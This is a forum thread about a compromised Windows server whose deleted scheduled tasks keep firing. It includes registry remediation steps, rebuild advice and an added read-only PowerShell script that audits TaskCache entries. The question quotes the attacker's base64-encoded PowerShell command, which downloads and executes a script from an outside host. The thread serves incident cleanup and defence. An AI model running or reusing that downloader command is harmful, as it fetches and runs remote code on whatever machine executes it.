Deleted scheduled tasks are still running

  • Question

  • My server was hacked by others.

    There are some scheduled tasks that run a PowerShell command. I deleted all of them, but those tasks are still running. What should I do?

    Here is the PowerShell command:

    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQALwBnAD8AaAAxADkAMAAzADIAMQAnACkA


    Wednesday, April 3, 2019 5:55 AM

Answers

  • Hi,

    We could follow these steps to rebuild the Task Scheduler (it will delete your tasks):

    1. Type regedit in the search box and press Enter.

    2. Click File > Export, type the file name and save it.

    3. Find the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule key and delete this key.

    4. Save the changes and exit the Registry Editor.

    5. Check whether the Task Scheduler runs normally.

    Best regards,
    Yilia


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.


    Thursday, April 4, 2019 3:27 AM
  • I solved it myself. I disabled the Task Scheduler service by editing the registry, then rebooted, then deleted the abnormal entries under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, and then restored the Task Scheduler service to start automatically.

    Deleting the whole key as you suggested is really too destructive; some of the system's built-in scheduled tasks would be gone.

    Yes, I resolved it myself.

    That PowerShell script downloads a script from a website. The script creates some scheduled tasks to run a PowerShell script. Although I deleted all the scheduled tasks, those tasks were still running. I modified HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 4 to disable the Task Scheduler service, restarted my server, cleaned HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, and restored HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Start to 2 to run the Task Scheduler service again.

    Those deleted tasks stopped running.



    • Marked as answer by Chivas_Tan Wednesday, April 10, 2019 2:50 PM
    Wednesday, April 10, 2019 2:46 PM
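    The marked answer cleaned TaskCache by hand after disabling the service, and Yilia's answer asks for a registry export before any registry change. The PowerShell script below is an added example, not code from this thread, from Chivas_Tan or from Microsoft. It automates the safe part of that work: it exports the TaskCache key to a .reg backup and then lists the cached task entries that the Task Scheduler UI can no longer show, so the entries to remove can be reviewed before the service is touched. It assumes the TaskCache layout used since Windows 8 / Server 2012 (Tasks\{GUID} keys with Path, Author, Date and Actions values; Tree\<task path> keys with Id and SD values) and the task XML files under %SystemRoot%\System32\Tasks; the backup folder, the Get-ActionHint helper and the output file names are my own choices. It must run from an elevated session and removes nothing.

```powershell
<#
  Added example (not from the thread): audit the Task Scheduler registry cache.
  1. Back up the TaskCache key with reg.exe (the step Yilia's answer describes).
  2. Index TaskCache\Tree, which is what the UI and schtasks enumerate.
  3. Walk TaskCache\Tasks\{GUID} and flag entries the UI cannot show:
       - GUID with no Tree node referencing it (orphan),
       - Tree node without an SD (security descriptor) value (hidden),
       - no task XML file under %SystemRoot%\System32\Tasks.
  Assumed layout: Windows 8 / Server 2012 and later. Run elevated. Read-only.
#>
[CmdletBinding()]
param(
    # Assumed location for the .reg backup and the CSV of flagged entries.
    [string]$BackupDir = (Join-Path $env:SystemDrive 'TaskCacheBackup')
)

$cacheReg  = 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache'
$cacheKey  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache'
$tasksKey  = "$cacheKey\Tasks"
$treeKey   = "$cacheKey\Tree"
$taskFiles = Join-Path $env:SystemRoot 'System32\Tasks'

# --- 1. Backup first, so a mistaken deletion can be re-imported -----------------
New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
$backupFile = Join-Path $BackupDir ('TaskCache-{0:yyyyMMdd-HHmmss}.reg' -f (Get-Date))
& reg.exe export $cacheReg $backupFile /y | Out-Null
if ($LASTEXITCODE -ne 0) { throw "reg.exe export failed (exit $LASTEXITCODE); not continuing." }
Write-Host "TaskCache exported to $backupFile"

# --- 2. Index the Tree: GUID -> node name and whether the node still has an SD --
$tree = @{}
Get-ChildItem -Path $treeKey -Recurse | ForEach-Object {
    $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    if ($p -and $p.PSObject.Properties['Id']) {
        $tree[$p.Id] = [pscustomobject]@{
            Node  = $_.PSPath -replace '^.*TaskCache\\Tree', 'Tree'
            HasSD = [bool]$p.PSObject.Properties['SD']
        }
    }
}

# --- 3. Walk Tasks\{GUID}; pull readable strings out of the binary Actions blob --
function Get-ActionHint([byte[]]$Blob) {
    # Actions is REG_BINARY containing UTF-16LE strings (program, arguments);
    # printable runs are enough to see which command the task launches.
    if (-not $Blob) { return '' }
    $text = [System.Text.Encoding]::Unicode.GetString($Blob)
    ([regex]::Matches($text, '[\x20-\x7E]{6,}') | ForEach-Object { $_.Value }) -join ' | '
}

$report = foreach ($task in Get-ChildItem -Path $tasksKey) {
    $guid  = $task.PSChildName
    $props = Get-ItemProperty -Path $task.PSPath -ErrorAction SilentlyContinue
    $entry = $tree[$guid]
    $xml   = if ($props.Path) { Join-Path $taskFiles $props.Path.TrimStart('\') } else { $null }
    [pscustomobject]@{
        Guid       = $guid
        Path       = $props.Path
        Author     = $props.Author
        Date       = $props.Date
        InTree     = [bool]$entry
        HasSD      = $(if ($entry) { $entry.HasSD } else { $false })
        HasXml     = [bool]($xml -and (Test-Path -LiteralPath $xml))
        ActionHint = Get-ActionHint $props.Actions
    }
}

# --- 4. Report ------------------------------------------------------------------
$suspect = @($report | Where-Object { -not $_.InTree -or -not $_.HasSD -or -not $_.HasXml })

"`nTask Scheduler service Start value (2 = automatic, 4 = disabled):"
(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Schedule' -Name Start).Start

"`n{0} cached task entries, {1} flagged:" -f @($report).Count, $suspect.Count
$suspect | Sort-Object Path | Format-Table Guid, Path, InTree, HasSD, HasXml, ActionHint -AutoSize -Wrap

# Keep the flagged list next to the backup so the cleanup can be reviewed later.
if ($suspect.Count -gt 0) {
    $suspect | Export-Csv -Path (Join-Path $BackupDir 'flagged-tasks.csv') -NoTypeInformation
}
```

    Entries with InTree = False or HasSD = False are not listed by the Task Scheduler UI but are still loaded by the service, which matches what the original poster saw after deleting the visible tasks. Removing them follows the order the marked answer gives: set Services\Schedule\Start to 4, reboot, delete the flagged GUID keys (and any Tree nodes that point at them), then restore Start to 2; the .reg backup can be re-imported if a built-in task goes with them. tim's point still applies: on a host where an unknown downloader ran, this triage shows what the script planted, not that nothing else was left behind.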

All replies

  • Best solution for recovering a hacked server is to reformat the disk and reinstall the operating system and applications.  Recover any necessary data from a time period that you know is safe from the hack.  You might be seeing something that is amiss from the hack and be able to remove that.  But you do not know if there is something else lurking in the environment that you cannot see.  The only way to be sure is to rebuild your system.

    tim

    Wednesday, April 3, 2019 1:03 PM
  • That's horrible. There are 40+ servers hacked, and all of them are in a production environment.


    Thursday, April 4, 2019 7:20 AM
  • Bro, can we use Chinese?

    Do you mean exporting the whole registry, or just one key?



    Thursday, April 4, 2019 7:21 AM
  • Hello,

    Yes, that's fine.

    Exporting the registry is mainly to back it up, so that if a later registry change causes unnecessary errors, it can be restored.

    You can export only the registry key you are about to modify.

    How to back up and restore the registry in Windows:

    https://support.microsoft.com/zh-cn/help/322756/how-to-back-up-and-restore-the-registry-in-windows

    Best regards,

    Yilia


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.

    Thursday, April 4, 2019 7:39 AM
  • Yes, it is horrible.  But no matter what the operating system, if you have been cracked/hacked, the only way to ensure a clean environment is rebuilding.  If you fix this one obvious thing, how do you know that the cracker/hacker has not left behind something else?  The only way to be sure, is to rebuild.  And you may have to rebuild in a separate environment because without knowledge of the type of crack/hack, that thing that is left may propagate itself to any new computer placed into the environment.

    tim

    Thursday, April 4, 2019 1:24 PM
  • Hi,

    Is there anything I can do for you?

    If you have any problems or concerns, please feel free to post here. 

    Best regards,

    Yilia



    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.


    Wednesday, April 10, 2019 2:04 AM
  • Please.  As a moderator you should know that this is an English language forum.  This is your third post in Chinese.

    tim

    Wednesday, April 10, 2019 1:36 PM
  • I know.

    I wrote my post in English first. I guess that guy Yilia Zhao is Chinese, because his name looks like a Chinese name, so I wrote in Chinese to reply to him.




    Wednesday, April 10, 2019 2:50 PM